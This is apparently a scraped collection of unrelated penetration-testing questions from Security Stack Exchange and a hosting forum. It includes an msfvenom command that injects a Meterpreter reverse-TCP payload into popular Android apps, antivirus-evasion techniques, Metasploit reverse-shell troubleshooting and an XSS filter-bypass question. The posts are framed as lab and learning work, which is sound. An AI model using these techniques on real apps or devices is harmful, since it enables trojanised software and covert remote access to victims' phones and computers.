Free / online penetration test tools – Information Security Stack Exchange

My employer has used an external consultant for penetration testing in the past, which has been really beneficial for the development team.

Now I am working on a private development and I cannot allow external pentesting. I have started researching some tools online and I have started testing them. Does anyone have experience relying solely on free tools and what do you recommend? How does it compare with the use of a security consultant? I know it won't be that good, but is it really much poorer or do consultants only use very similar tools?

penetration test – MSFVenom No Permissions on infected apk

When injecting payloads into existing apk files, I have noticed that sometimes the permissions written in the AndroidManifest.xml file are not always read.

I would have downloaded a Google Play apk file and then run the following command:

msfvenom -x test.apk -p android/meterpreter/reverse_tcp LHOST=my_host LPORT=my_port -o exploited-test.apk

The following command has worked for the application called "Pixel Dungeon", and the following permission screen appeared as expected:

However, it has not worked in applications such as Kik, B612 camera filter, Facebook Lite and some others.
I get the following screen when I try it on Kik:

Does it have to do with the fact that these applications are more secure or run on an Android version that uses a different permission model?


Exploited machine: Samsung Galaxy Tab SMT-530
Apktool version: 2.4.0
Metasploit Framework: 5.0.28-dev

I'm not sure what other version information I can provide to help solve the problem.

Web hosting + business penetration tests?

Web hosting + business penetration tests? | Web Hosting Talk


I want to start a hosting business and offer periodic penetration tests for clients' web applications. Do you think people would be interested in that "conjunction" of offers?
I have been working as a systems administrator at the hosting company for 10 years, and I am now working as a penetration tester, so I am thinking about how to combine this knowledge in a positive way. Actually, pen tests are quite expensive; the company I work for usually charges clients $1400 per day of testing, and it is 4 to 5 days at least. Anyway, for hosting clients, I think it should be included in the monthly hosting price.


network: How to perform a security test / revision / penetration test of Ethernet ports?


penetration test: the antivirus and its function in detecting the execution of the payload?

I recently started learning about ethical hacking and penetration testing. Along the way, as I am sure many people learning about these topics do, I have encountered some obstacles. I will not write an essay about my daily life and study schedule because I know that I will simply be super famous and I will not be able to get peace. Or, I'll bore everyone to death. So I'm going to cut to the chase …

My first question is this:
1) Antivirus software works by means of signature-based detection. Signature-based detection evaluates the elements (perhaps not the correct word?) based on a large database of known threats. The software carries with it its own digital signature. If this signature for a particular item matches a known signature in the database, it is marked as malicious and the necessary steps are taken.

  • Do AVs depend solely on this method?
  • Let's say, for example, that the malware passes the AV (because its signature is new): is the malware home and dry?
  • Or do things such as behavioral analysis still prevail? Let's say the malware executes known commands or uses known components: Metasploit Framework, Empire, etc. The malware has already passed the AV in terms of signature-based detection, provided that the malware is clean. Are there other possibilities that other defenses can detect malicious activity?
  • How long does the AV "hang" on to a particular executable? Let's say it starts scanning it the moment it hits the disk. Okay, it's clean (according to the AV): will it approve the executable, decrease its vigilance, increase it, put it on the whitelist or ignore it?

2) Are binary executables dead in terms of initiating malicious payloads?
– I see many articles about known threats, particularly in the past, where the malicious payload was not simply downloaded in executable format and then executed. A payload can, for example, be hidden in a PDF or a Word document, and even then, the payload has not yet been executed and is simply downloaded by a PowerShell command.
– At what moment are binary executable payloads in .exe format useful in a possible attack, in any case? It's obvious to me that AV vendors today dissect and tear apart many .exe payloads, and rightly so. It is, by far, from what I have learned, the most common vector of attack (if that is the correct way to explain it?) and also the oldest and most used. A person downloads a file that he thinks is legitimate, it is not, it sets up a reverse shell, done. Or, a person downloads a file, believes it is legitimate, it is a keylogger, done, or a RAT.

I still feel that there is more behind the scenes. The more I have gotten myself into the task of exploiting a Windows-based system (in my own lab environment), the harder and sometimes more messy it can be to simply put the thing on the computer in the first place. I have used hexadecimal editors, UPX, useless dlls aggregates and resources to confuse detection analysis, signed false executables, modified exe templates and yet … I feel something is missing …

Hmmm …
I appreciate comments on this!
Thank you!

penetration test: reverse shell that works with Kali 2016, but not with Kali 2019.2, using Metasploit ms08_067_netapi

I have an unpatched Windows XP Home VM, a Kali 2019.2 VM and an old Kali 2016 VM. By using Metasploit ms08_067_netapi, I can get a reverse shell successfully, but only on the old Kali box.

I am trying to get the same reverse shell on Kali 2019.2, but without success. However, I was able to obtain a meterpreter bind shell that runs from the Win XP box to the 2019.2 virtual machine using the same exploit.

I have done the following with iptables to completely clear everything:

sudo iptables -F
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT

But I still cannot catch the reverse shell. Metasploit reports:

[*] Exploit completed, but no session was created.

Finally, I was able to capture a reverse shell from the Windows XP machine to the 2019.2 VM by creating a windows/meterpreter/reverse_tcp executable file using msfvenom and running it on the target Win XP machine (and catching it on the Kali 2019.2 VM using multi/handler), but I still cannot get a reverse shell from Metasploit's ms08_067_netapi.

Any information about this error would be greatly appreciated!

Penetration test – Building software for the HackRF.

I want to start using SDR radio devices to do tests. I was doing some research and I came across a device called HackRF. The problem with this device was that it required the use of GNU Radio and there is no Python library available for HackRF. So my questions are: how could I develop my own version of GNU Radio? Is it possible for Python to interface with HackRF, and where can I get more information about the concepts behind HackRF? As a side note, I'm using Kali Linux as my operating system.

Penetration test – How can I execute my JS payload?

Basically, I'm trying to make my JavaScript scripts work, but because of server-side filters like htmlspecialchars, they continue to fail.
Our input is placed inside this code block:

Jagirao : My text goes here June 17 23:30X

How can I inject the code? I have tried several methods from the OWASP cheat sheet too, but they do not work. The site uses the UTF-8 charset.

< becomes &lt; and > becomes &gt;; only ' survives.

Is it possible to execute JS scripts in these circumstances?

penetration test – Nmap Windows 10 OS Detection

Recently, I've been practicing penetration tests and I've stopped trying to use nmap to detect the operating system for a Windows 10 machine.
For the most part, it is not able to identify the machine as Windows 10, but it comes close by guessing that it is Windows. I've also tried p0f and xprobe2 with no luck.

What else can I use to successfully detect a Windows 10 machine on the network?

* From a blackbox perspective.

Thank you.

Run internal penetration test without touching the Active Directory

I am part of a penetration testing team and part of my responsibilities for this quarter is organizing the red team engagements for the rest of the year.

This quarter, we have received acceptance from all members of the organization, except the Active Directory teams. They do not want us to run any AD-related attacks beyond the user / passwd. How can we safeguard the Active Directory environment from our engagement?

I have considered blocking ports 445 and 139 for all exploration / exploitation activities, but I really do not know if that will help; in addition, doing so greatly reduces our attack surface.

Please, do not try to explain that this is a bad idea. I know. It's ridiculous. An attacker will never act on a network without attempting to hack the AD. I tried to explain this. The boss does not agree because if we attack the AD, we could take it down. But once again, the same point applies. No attacker will do this when they hack us, but whatever. I just need solutions. Thank you.
